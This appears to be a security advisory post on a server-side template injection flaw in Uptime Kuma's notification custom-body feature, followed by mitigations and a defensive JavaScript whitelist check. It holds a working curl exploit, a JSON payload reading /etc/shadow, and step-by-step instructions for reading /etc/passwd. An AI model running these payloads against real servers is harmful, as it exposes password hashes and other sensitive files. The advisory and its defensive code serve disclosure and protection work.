How the mentioned CVE works:
The vulnerability exists in the notification system, specifically for Webhook and Telegram types. When a user sets a notification to use a ‘custom’ request body, the `send()` function passes the user-supplied content directly to the `renderTemplate()` function without sanitization. This function instantiates the Liquid.js template engine and parses the input. Since the Liquid engine is not properly sandboxed or restricted, an attacker can inject template tags like {% render '/etc/passwd' %}. During template rendering, the engine processes this tag, interpreting it as a directive to read and include the contents of the specified server-side file, leading to arbitrary file disclosure through Server-Side Template Injection.
Platform: Uptime Kuma
Version: <= 1.23.x
Vulnerability: SSTI
Severity: Critical
Date: 2024-10-XX
Prediction: 2024-11-15
What Undercode Say:
```bash
curl -X POST http://kuma-server/api/notification/test/1 -H "Content-Type: application/json" -d '{"webhookContentType": "custom", "webhookCustomBody": "{\"\": {% render '\''/etc/passwd'\'' %} }" }'
```
Exploit payload for custom webhook body:
```json
{
  "data": "{% render '/etc/shadow' %}"
}
```
How to Exploit:
1. Authenticate to Uptime Kuma.
2. Navigate to Notifications.
3. Create/Edit a Webhook notification.
4. Set ‘Request Body’ to ‘Custom Body’.
5. Insert the SSTI payload: `{"": {% render '/etc/passwd' %}}`
6. Trigger a test notification.
7. Observe the file contents in the webhook response or server logs.
Protection from this CVE:
Sanitize user input in `renderTemplate`.
Implement a sandbox for Liquid.js.
Use a strict whitelist for allowed template operations.
Apply the official patch.
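The "strict whitelist" mitigation above, as an added example that is not Uptime Kuma's code: a pre-check a notification provider could run on a user-supplied custom body before it reaches the Liquid engine. It allows only bare `{{ variable }}` output tags over an allow-list and rejects every `{% ... %}` block tag, so directives such as `render` never reach the template engine. The variable names and the two sample bodies are constructed for illustration.

```javascript
// Added example, not project code: whitelist check for a user-supplied
// notification body before it is handed to a Liquid template engine.

// Variable names are assumed here for illustration; a real deployment
// would take them from the application's own template context.
const ALLOWED_VARIABLES = new Set(["msg", "monitorName", "status", "heartbeatTime"]);

// Returns { ok, problems }. Only `{{ <allowed identifier> }}` passes:
// no filters, no property access, no literals, and no block tags at all.
function validateCustomBody(body) {
  const problems = [];
  // Alternation: group 1 = output tag body, group 2 = block tag body.
  const tagRe = /\{\{([\s\S]*?)\}\}|\{%([\s\S]*?)%\}/g;
  let match;
  while ((match = tagRe.exec(body)) !== null) {
    const output = match[1];
    const block = match[2];
    if (block !== undefined) {
      // Every block tag is a programmable directive (render, include, ...);
      // none are needed for a plain notification body, so all are refused.
      const name = block.trim().split(/\s+/)[0] || "(empty)";
      problems.push(`block tag not allowed: {% ${name} %}`);
      continue;
    }
    const expr = output.trim();
    if (!/^[A-Za-z_][A-Za-z0-9_]*$/.test(expr) || !ALLOWED_VARIABLES.has(expr)) {
      problems.push(`variable not allowed: {{ ${expr} }}`);
    }
  }
  // Stray delimiters left after removing well-formed tags are refused too,
  // since a lenient parser might still try to interpret them.
  const remaining = body.replace(tagRe, "");
  if (/\{\{|\{%|\}\}|%\}/.test(remaining)) {
    problems.push("unbalanced template delimiter");
  }
  return { ok: problems.length === 0, problems };
}

// Constructed sample inputs: a benign body, and the payload shape quoted
// in the post above (used here only to show that the check rejects it).
const SAFE_BODY = '{"text": "{{ monitorName }} is {{ status }}: {{ msg }}"}';
const SSTI_BODY = '{"": {% render \'/etc/passwd\' %}}';

console.log(validateCustomBody(SAFE_BODY)); // ok: true
console.log(validateCustomBody(SSTI_BODY)); // ok: false, one block-tag problem
```

This check complements, rather than replaces, restricting the engine itself (disabling file-reading tags and the template file system), which is the sandboxing step listed above.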
Impact:
Arbitrary File Read
Sensitive Data Leakage
Post-Authentication Exploit
Server Information Disclosure
Sources:
Reported By: github.com